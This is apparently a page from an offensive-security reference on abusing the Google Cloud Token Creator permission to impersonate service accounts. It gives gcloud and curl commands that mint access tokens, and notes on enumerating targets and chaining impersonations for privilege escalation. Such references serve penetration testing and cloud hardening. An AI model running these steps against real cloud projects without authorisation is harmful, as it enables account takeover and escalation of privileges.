iam.serviceAccounts.getAccessToken (the generateAccessToken API, held by roles/iam.serviceAccountTokenCreator) mints a short-lived OAuth access token for a target service account. It is the most direct impersonation: no key, no deploy, just ask IAM Credentials for the target's token and act as it immediately.
Mint and use the token#
# built into gcloud: run any command as the target SA
gcloud compute instances list --impersonate-service-account <target>@<proj>.iam.gserviceaccount.com
# or mint the raw token
gcloud auth print-access-token --impersonate-service-account <target>@<proj>.iam.gserviceaccount.com
# REST
curl -s -X POST -H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/<target>@<proj>.iam.gserviceaccount.com:generateAccessToken" \
-d '{"scope":["https://www.googleapis.com/auth/cloud-platform"]}'
Exploitation notes#
- Token Creator on a more privileged SA is a complete escalation; enumerate who you can impersonate from the IAM policy.
- The token is short-lived (default one hour) but re-mintable as long as you hold the permission.
- Chain it: impersonate SA-A, then use A's Token Creator on SA-B to reach B (implicit delegation).
Tools#
- gcloud (
--impersonate-service-account,auth print-access-token).